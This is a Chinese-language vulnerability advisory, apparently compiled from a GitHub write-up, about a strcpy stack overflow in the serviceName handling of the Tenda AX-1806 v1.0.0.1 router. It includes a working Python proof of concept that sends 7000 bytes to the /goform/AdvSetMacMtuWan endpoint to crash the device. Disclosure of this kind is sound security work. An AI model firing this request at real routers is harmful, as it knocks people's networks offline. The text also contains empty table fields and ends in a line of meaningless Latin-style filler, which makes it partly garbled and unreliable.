# N/A
## 概述
Tenda AX-1806 v1.0.0.1 设备中发现存在栈溢出漏洞,位于 sub_65A28 函数的 serviceName 参数处理过程中。
## 影响版本
Tenda AX-1806 v1.0.0.1
## 细节
攻击者可通过构造恶意请求,向 serviceName 参数传入超长数据,触发 sub_65A28 函数中的栈溢出。
## 影响
可导致拒绝服务(DoS),设备可能崩溃或重启,丧失正常网络功能。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: VulnbyCola/Tenda/AX-1806/6/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接
标签:
神龙速读:
## 漏洞关键信息
### 漏洞概要
- **厂商**: Tenda
- **产品**: AX-1806
- **版本**: v1.0.0.1
- **漏洞类型**: 堆栈溢出 (Stack Overflow)
- **作者**: Shuhao Shen
- **机构**: 华中科技大学 (Huazhong University of Science and Technology, HUST)
### 漏洞原因
在函数`sub_65A28`中,`serviceName`的值通过用户控制的输入`v2`获取,并使用`strcpy`复制到固定大小的栈缓冲区`v5`中。由于未对源字符串进行长度检查,当`serviceName`参数长度过长时,会出现栈溢出,导致相邻栈内存损坏,最终可能引发服务崩溃和拒绝服务条件。
### PoC (概念验证)
为了重现该漏洞,可以按以下步骤操作:
1. 通过`qemu-system`或其他方式启动固件。
2. 使用以下PoC代码进行攻击:
```python
import requests
url = "http://192.168.20.12/goform/AdvSetMacMtuWan"
serviceName = "A"*7000
data = {"serviceName": serviceName}
r = requests.post(url, data=data)
print(r.status_code, r.text)
```
### 结果
成功触发漏洞后,目标路由器崩溃,无法持续提供正常服务。
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.